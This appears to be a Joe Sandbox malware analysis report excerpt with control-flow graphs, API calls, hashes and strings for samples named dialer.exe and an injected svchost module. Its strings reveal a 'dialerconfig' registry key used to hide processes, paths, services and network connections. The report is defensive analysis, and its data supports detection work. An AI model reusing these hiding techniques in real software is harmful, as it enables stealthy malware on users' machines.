                                                                                control_flow_graph 427 140001ba0-140001bc0 428 140001bc2-140001bd7 427->428 429 140001c09 427->429 430 140001be9-140001bf1 428->430 431 140001c0c-140001c17 call 1400023b0 429->431 432 140001bf3-140001c02 430->432 433 140001be0-140001be7 430->433 438 140001cf4-140001cfe call 140001d40 431->438 439 140001c1d-140001c6c call 1400024d0 VirtualQuery 431->439 432->433 435 140001c04 432->435 433->430 433->431 437 140001cd7-140001cf3 memcpy 435->437 443 140001d03-140001d1e call 140001d40 438->443 439->443 444 140001c72-140001c79 439->444 446 140001d23-140001d38 GetLastError call 140001d40 443->446 447 140001c7b-140001c7e 444->447 448 140001c8e-140001c97 444->448 450 140001cd1 447->450 451 140001c80-140001c83 447->451 452 140001ca4-140001ccf VirtualProtect 448->452 453 140001c99-140001c9c 448->453 450->437 451->450 455 140001c85-140001c8a 451->455 452->446 452->450 453->450 456 140001c9e 453->456 455->450 457 140001c8c 455->457 456->452 457->456
                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C30,0000000140007C30,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C30,0000000140007C30,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                                • memcpy.MSVCRT ref: 0000000140001CE0
                                                                                • GetLastError.KERNEL32(?,?,?,?,0000000140007C30,0000000140007C30,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000040.00000002.3306476335.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000040.00000002.3306378142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306529259.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306623785.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306674481.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                • API String ID: 2595394609-2123141913
                                                                                • Opcode ID: 2308ca6eaf7bf6aa6e5fd7c2dad65274fa0cdee15cec1e8ea3a4e6064b89d7b3
                                                                                • Instruction ID: 43a0cbb6118ac9185dba083df37bfa5a8251914ca7472923389a44b33500f4d1
                                                                                • Opcode Fuzzy Hash: 2308ca6eaf7bf6aa6e5fd7c2dad65274fa0cdee15cec1e8ea3a4e6064b89d7b3
                                                                                • Instruction Fuzzy Hash: BC4153F1601A4486FA26DF47F884BE927A0E78DBC4F584122EF0E877B1DA38C586C300
                                                                                Function 0000000140002104 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 458 140002104-14000210b 459 140002111-140002128 EnterCriticalSection 458->459 460 140002218-140002221 458->460 461 14000220b-140002212 LeaveCriticalSection 459->461 462 14000212e-14000213c 459->462 463 140002272-140002280 460->463 464 140002223-14000222d 460->464 461->460 465 14000214d-140002159 TlsGetValue GetLastError 462->465 466 140002241-140002263 DeleteCriticalSection 464->466 467 14000222f 464->467 468 14000215b-14000215e 465->468 469 140002140-140002147 465->469 466->463 470 140002230-14000223f 467->470 468->469 471 140002160-14000216d 468->471 469->461 469->465 470->466 471->469
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000040.00000002.3306476335.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000040.00000002.3306378142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306529259.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306623785.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306674481.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                                                • String ID:
                                                                                • API String ID: 926137887-0
                                                                                • Opcode ID: d9a872710ed99017faa0aba6aa6fc20f036904564ea786093dba8e779631c78c
                                                                                • Instruction ID: a4e62dc8e7d81a00801526d2a511ced90750e179f40fb15ec58be7477c50376c
                                                                                • Opcode Fuzzy Hash: d9a872710ed99017faa0aba6aa6fc20f036904564ea786093dba8e779631c78c
                                                                                • Instruction Fuzzy Hash: F221E3B0715A0292FA1BDB53F9483E92360B76CBD0F444161EB1E47AB4DB7A8986C300
                                                                                Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 474 140001880-14000189c 475 1400018a2-1400018f9 call 140002420 call 140002660 474->475 476 140001a0f-140001a1f 474->476 475->476 481 1400018ff-140001910 475->481 482 140001912-14000191c 481->482 483 14000193e-140001941 481->483 484 14000194d-140001954 482->484 485 14000191e-140001929 482->485 483->484 486 140001943-140001947 483->486 489 140001956-140001961 484->489 490 14000199e-1400019a6 484->490 485->484 487 14000192b-14000193a 485->487 486->484 488 140001a20-140001a26 486->488 487->483 491 140001b87-140001b98 call 140001d40 488->491 492 140001a2c-140001a37 488->492 493 140001970-14000199c call 140001ba0 489->493 490->476 494 1400019a8-1400019c1 490->494 492->490 496 140001a3d-140001a5f 492->496 493->490 495 1400019df-1400019e7 494->495 499 1400019e9-140001a0d VirtualProtect 495->499 500 1400019d0-1400019dd 495->500 501 140001a7d-140001a97 496->501 499->500 500->476 500->495 504 140001b74-140001b82 call 140001d40 501->504 505 140001a9d-140001afa 501->505 504->491 511 140001b22-140001b26 505->511 512 140001afc-140001b0e 505->512 515 140001b2c-140001b30 511->515 516 140001a70-140001a77 511->516 513 140001b5c-140001b6c 512->513 514 140001b10-140001b20 512->514 513->504 518 140001b6f call 140001d40 513->518 514->511 514->513 515->516 517 140001b36-140001b57 call 140001ba0 515->517 516->490 516->501 517->513 518->504
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000040.00000002.3306476335.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000040.00000002.3306378142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306529259.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306623785.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306674481.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                • API String ID: 544645111-395989641
                                                                                • Opcode ID: 0e7c40df18b2d889cb18027e33d092cab4b671df9256c1c141fb24a14e92ca32
                                                                                • Instruction ID: 2d94c89a0dbc5eaf2f8d64577ab743d1a622af76d4dc519d29f5ea4fbe6584bb
                                                                                • Opcode Fuzzy Hash: 0e7c40df18b2d889cb18027e33d092cab4b671df9256c1c141fb24a14e92ca32
                                                                                • Instruction Fuzzy Hash: 245114B6B11544DAEB16CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700
                                                                                Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 522 140001800-140001810 523 140001812-140001822 522->523 524 140001824 522->524 525 14000182b-140001867 call 140002290 fprintf 523->525 524->525
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000040.00000002.3306476335.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000040.00000002.3306378142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306529259.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306623785.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306674481.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: fprintf
                                                                                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                • API String ID: 383729395-3474627141
                                                                                • Opcode ID: 0203b8193e6bd01d2269ae2997a65bc3a8e51b9bb463c4828a750bc6846778a9
                                                                                • Instruction ID: 7f685618ca937b17e8a77ff3462c9f9b221cac2c692d946b3ecbcedae4a5563c
                                                                                • Opcode Fuzzy Hash: 0203b8193e6bd01d2269ae2997a65bc3a8e51b9bb463c4828a750bc6846778a9
                                                                                • Instruction Fuzzy Hash: 15F09671A14A4482E612EF6AB9417ED6360E75D7C1F50D221FF4E576A6DF3CD182C310
                                                                                Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 528 14000219e-1400021a5 529 140002272-140002280 528->529 530 1400021ab-1400021c2 EnterCriticalSection 528->530 531 140002265-14000226c LeaveCriticalSection 530->531 532 1400021c8-1400021d6 530->532 531->529 533 1400021e9-1400021f5 TlsGetValue GetLastError 532->533 534 1400021f7-1400021fa 533->534 535 1400021e0-1400021e7 533->535 534->535 536 1400021fc-140002209 534->536 535->531 535->533 536->535
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000040.00000002.3306476335.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000040.00000002.3306378142.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306529259.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306623785.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000040.00000002.3306674481.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                • String ID:
                                                                                • API String ID: 682475483-0
                                                                                • Opcode ID: f5d6f4d19039afd7669e997dc8e3bf76fcc59d2d2e4ea198e7921c6a9a2d6c1d
                                                                                • Instruction ID: fa24f775fc133e2fb8ddb0fda3fc4b66b3fc9b3ea8c54cca86470a464386792f
                                                                                • Opcode Fuzzy Hash: f5d6f4d19039afd7669e997dc8e3bf76fcc59d2d2e4ea198e7921c6a9a2d6c1d
                                                                                • Instruction Fuzzy Hash: 4F01B2B5705A0192FA1BDB53FE083E86360B76CBD1F454061EF0953AB4DF79C996C200

                                                                                Execution Graph

                                                                                Execution Coverage:56.2%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:87.5%
                                                                                Total number of Nodes:8
                                                                                Total number of Limit Nodes:1

                                                                                Callgraph

                                                                                • Executed
                                                                                • Not Executed
                                                                                • Opacity -> Relevance
                                                                                • Disassembly available
                                                                                callgraph 0 Function_0000000140846321 1 Function_00000001408460B2 2 Function_00000001408460F0 2->0 2->1 3 Function_0000000140846070 3->2

                                                                                Executed Functions

                                                                                Function 00000001408460F0 Relevance: 6.2, APIs: 4, Instructions: 209memorylibraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 1408460f0-1408460f3 1 1408460fd-140846101 0->1 2 140846103-14084610b 1->2 3 14084610d 1->3 2->3 4 1408460f5-1408460fa 3->4 5 14084610f-140846112 3->5 4->1 6 14084611b-140846122 5->6 8 140846124-14084612c 6->8 9 14084612e 6->9 8->9 10 140846114-140846119 9->10 11 140846130-140846133 9->11 10->6 12 140846135-140846143 11->12 13 14084614e-140846150 11->13 15 140846145-14084614a 12->15 16 14084619d-1408461bc 12->16 17 140846152-140846158 13->17 18 14084615a 13->18 20 140846184-140846187 15->20 22 14084614c 15->22 19 1408461ed-1408461f0 16->19 17->18 18->20 21 14084615c-140846160 18->21 25 1408461f5-1408461fb 19->25 26 1408461f2-1408461f3 19->26 33 140846189-140846198 call 1408460b2 20->33 23 140846162-140846168 21->23 24 14084616a 21->24 22->21 23->24 24->20 27 14084616c-140846173 24->27 30 140846202-140846206 25->30 28 1408461d4-1408461d8 26->28 44 140846175-14084617b 27->44 45 14084617d 27->45 31 1408461be-1408461c1 28->31 32 1408461da-1408461dd 28->32 34 140846208-140846220 LoadLibraryA 30->34 35 14084625e-140846266 30->35 31->25 36 1408461c3 31->36 32->25 39 1408461df-1408461e3 32->39 33->1 41 140846222-140846229 34->41 38 14084626a-140846273 35->38 43 1408461c4-1408461c8 36->43 46 140846275-140846277 38->46 47 1408462a2-140846302 VirtualProtect * 2 call 140846321 38->47 39->43 48 1408461e5-1408461ec 39->48 41->30 42 14084622b 41->42 50 140846237-14084623f 42->50 51 14084622d-140846235 42->51 43->28 52 1408461ca-1408461cc 43->52 44->45 45->27 53 14084617f-140846182 45->53 54 140846279-140846288 46->54 55 14084628a-140846298 46->55 60 140846307-14084630c 47->60 48->19 57 140846241-14084624d GetProcAddressForCaller 50->57 51->57 52->28 58 1408461ce-1408461d2 52->58 53->33 54->38 55->54 59 14084629a-1408462a0 55->59 61 140846258 ExitProcess 57->61 62 14084624f-140846256 57->62 58->28 58->32 59->54 63 140846311-140846316 60->63 62->41 63->63 64 140846318 63->64
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000041.00000002.3306534127.0000000140840000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000041.00000002.3306380561.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000041.00000002.3306534127.00000001404DC000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000041.00000002.3306534127.0000000140500000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000041.00000002.3306534127.0000000140503000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000041.00000002.3306534127.000000014078B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000041.00000002.3306534127.000000014080D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000041.00000002.3309638252.0000000140847000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                                                • String ID:
                                                                                • API String ID: 1941872368-0
                                                                                • Opcode ID: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                                • Instruction ID: 1d24a93eb9004fb9ff5f788f669610d725ede0fbeb3cf7fc7a03e9414d8a6cfe
                                                                                • Opcode Fuzzy Hash: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                                • Instruction Fuzzy Hash: FE611A32F4026255EB274BB6AF843E87751931D7B4F49433DCB79423E6FA7488668B02

                                                                                Execution Graph

                                                                                Execution Coverage:0.7%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:81
                                                                                Total number of Limit Nodes:2
                                                                                execution_graph 14867 257e107273c 14869 257e107276a 14867->14869 14868 257e10728d4 14869->14868 14870 257e1072858 LoadLibraryA 14869->14870 14870->14869 14871 257e10a1abc 14877 257e10a1628 GetProcessHeap 14871->14877 14873 257e10a1ad2 Sleep SleepEx 14875 257e10a1acb 14873->14875 14875->14873 14876 257e10a1598 StrCmpIW StrCmpW 14875->14876 14922 257e10a18b4 14875->14922 14876->14875 14878 257e10a1648 __std_exception_copy 14877->14878 14939 257e10a1268 GetProcessHeap 14878->14939 14880 257e10a1650 14881 257e10a1268 2 API calls 14880->14881 14882 257e10a1661 14881->14882 14883 257e10a1268 2 API calls 14882->14883 14884 257e10a166a 14883->14884 14885 257e10a1268 2 API calls 14884->14885 14886 257e10a1673 14885->14886 14887 257e10a168e RegOpenKeyExW 14886->14887 14888 257e10a16c0 RegOpenKeyExW 14887->14888 14889 257e10a18a6 14887->14889 14890 257e10a16ff RegOpenKeyExW 14888->14890 14891 257e10a16e9 14888->14891 14889->14875 14893 257e10a1723 14890->14893 14894 257e10a173a RegOpenKeyExW 14890->14894 14943 257e10a12bc RegQueryInfoKeyW 14891->14943 14954 257e10a104c RegQueryInfoKeyW 14893->14954 14897 257e10a1775 RegOpenKeyExW 14894->14897 14898 257e10a175e 14894->14898 14895 257e10a16f5 RegCloseKey 14895->14890 14901 257e10a17b0 RegOpenKeyExW 14897->14901 14902 257e10a1799 14897->14902 14900 257e10a12bc 11 API calls 14898->14900 14905 257e10a176b RegCloseKey 14900->14905 14903 257e10a17d4 14901->14903 14904 257e10a17eb RegOpenKeyExW 14901->14904 14906 257e10a12bc 11 API calls 14902->14906 14907 257e10a12bc 11 API calls 14903->14907 14908 257e10a180f 14904->14908 14909 257e10a1826 RegOpenKeyExW 14904->14909 14905->14897 14910 257e10a17a6 RegCloseKey 14906->14910 14911 257e10a17e1 RegCloseKey 14907->14911 14912 257e10a104c 4 API calls 14908->14912 14913 257e10a1861 RegOpenKeyExW 14909->14913 14914 257e10a184a 14909->14914 14910->14901 14911->14904 14915 257e10a181c RegCloseKey 14912->14915 14917 257e10a1885 14913->14917 14918 257e10a189c RegCloseKey 14913->14918 14916 257e10a104c 4 API calls 14914->14916 14915->14909 14919 257e10a1857 RegCloseKey 14916->14919 14920 257e10a104c 4 API calls 14917->14920 14918->14889 14919->14913 14921 257e10a1892 RegCloseKey 14920->14921 14921->14918 14966 257e10a14a4 14922->14966 14960 257e10b6168 14939->14960 14941 257e10a1283 GetProcessHeap 14942 257e10a12ae __std_exception_copy 14941->14942 14942->14880 14944 257e10a148a __free_lconv_mon 14943->14944 14945 257e10a1327 GetProcessHeap 14943->14945 14944->14895 14948 257e10a133e __std_exception_copy __free_lconv_mon 14945->14948 14946 257e10a1352 RegEnumValueW 14946->14948 14947 257e10a1476 GetProcessHeap 14947->14944 14948->14946 14948->14947 14950 257e10a13d3 GetProcessHeap 14948->14950 14951 257e10a141e lstrlenW GetProcessHeap 14948->14951 14952 257e10a13f3 GetProcessHeap 14948->14952 14953 257e10a1443 StrCpyW 14948->14953 14961 257e10a152c 14948->14961 14950->14948 14951->14948 14952->14948 14953->14948 14955 257e10a11b5 RegCloseKey 14954->14955 14958 257e10a10bf __std_exception_copy __free_lconv_mon 14954->14958 14955->14894 14956 257e10a10cf RegEnumValueW 14956->14958 14957 257e10a114e GetProcessHeap 14957->14958 14958->14955 14958->14956 14958->14957 14959 257e10a116e GetProcessHeap 14958->14959 14959->14958 14962 257e10a157c 14961->14962 14965 257e10a1546 14961->14965 14962->14948 14963 257e10a1565 StrCmpW 14963->14965 14964 257e10a155d StrCmpIW 14964->14965 14965->14962 14965->14963 14965->14964 14967 257e10a14e1 GetProcessHeap 14966->14967 14968 257e10a14c1 GetProcessHeap 14966->14968 14972 257e10b6180 14967->14972 14969 257e10a14da __free_lconv_mon 14968->14969 14969->14967 14969->14968 14973 257e10b6182 14972->14973

                                                                                Executed Functions

                                                                                Function 00000257E10A1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction ID: 16feaae96375266c24b17968b5a080657b5ae57e6ff703aba3d68dcbcffacad4
                                                                                • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                • Instruction Fuzzy Hash: 2F711736358F1486EB15DF22FC5BB9963B4FB88B8AF001561EA4E47A68DF38C444C358
                                                                                Function 00000257E10A328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: aade9cdc764c3959dde9a52c1c94ad6719753b48d41f7c1d1db878778cbbdd05
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: A411F93269CF008AFB6EA761FC0F79E2294B7A4347F4081A5D906496D0EF7CC044C62C
                                                                                Function 00000257E10A1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00000257E10A1628: GetProcessHeap.KERNEL32 ref: 00000257E10A1633
                                                                                  • Part of subcall function 00000257E10A1628: HeapAlloc.KERNEL32 ref: 00000257E10A1642
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A16B2
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A16DF
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A16F9
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1719
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1734
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1754
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A176F
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A178F
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A17AA
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A17CA
                                                                                • Sleep.KERNEL32 ref: 00000257E10A1AD7
                                                                                • SleepEx.KERNELBASE ref: 00000257E10A1ADD
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A17E5
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1805
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1820
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1840
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A185B
                                                                                  • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A187B
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1896
                                                                                  • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A18A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: d712d7bd41ce4f32cb42d1788969e2e1ab98e8c502d066c5c5fdd1db537eb6f4
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: 9F31F871298F4582FF5E9726FE4B3E923A4AB44BC2F0858615E0987695FF34C451C228
                                                                                Function 00000257E107273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 110 257e107273c-257e10727a4 call 257e10729d4 * 4 119 257e10727aa-257e10727ad 110->119 120 257e10729b2 110->120 119->120 122 257e10727b3-257e10727b6 119->122 121 257e10729b4-257e10729d0 120->121 122->120 123 257e10727bc-257e10727bf 122->123 123->120 124 257e10727c5-257e10727e6 123->124 124->120 126 257e10727ec-257e107280c 124->126 127 257e107280e-257e1072836 126->127 128 257e1072838-257e107283f 126->128 127->127 127->128 129 257e1072845-257e1072852 128->129 130 257e10728df-257e10728e6 128->130 129->130 133 257e1072858-257e107286a LoadLibraryA 129->133 131 257e10728ec-257e1072901 130->131 132 257e1072992-257e10729b0 130->132 131->132 134 257e1072907 131->134 132->121 135 257e107286c-257e1072878 133->135 136 257e10728ca-257e10728d2 133->136 139 257e107290d-257e1072921 134->139 140 257e10728c5-257e10728c8 135->140 136->133 137 257e10728d4-257e10728d9 136->137 137->130 142 257e1072923-257e1072934 139->142 143 257e1072982-257e107298c 139->143 140->136 141 257e107287a-257e107287d 140->141 147 257e10728a7-257e10728b7 141->147 148 257e107287f-257e10728a5 141->148 145 257e1072936-257e107293d 142->145 146 257e107293f-257e1072943 142->146 143->132 143->139 149 257e1072970-257e1072980 145->149 150 257e107294d-257e1072951 146->150 151 257e1072945-257e107294b 146->151 152 257e10728ba-257e10728c1 147->152 148->152 149->142 149->143 153 257e1072963-257e1072967 150->153 154 257e1072953-257e1072961 150->154 151->149 152->140 153->149 156 257e1072969-257e107296c 153->156 154->149 156->149
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308766980.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction ID: e1821c6af69327561f239fb501c7fdcfb84665abf8bb743926d129d5342e2f1a
                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                • Instruction Fuzzy Hash: 4E617572B49B9087DB5AEF14E80B73DB3A2F744BE5F188161DE4903788CA78D852C704

                                                                                Non-executed Functions

                                                                                Function 00000257E10A2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
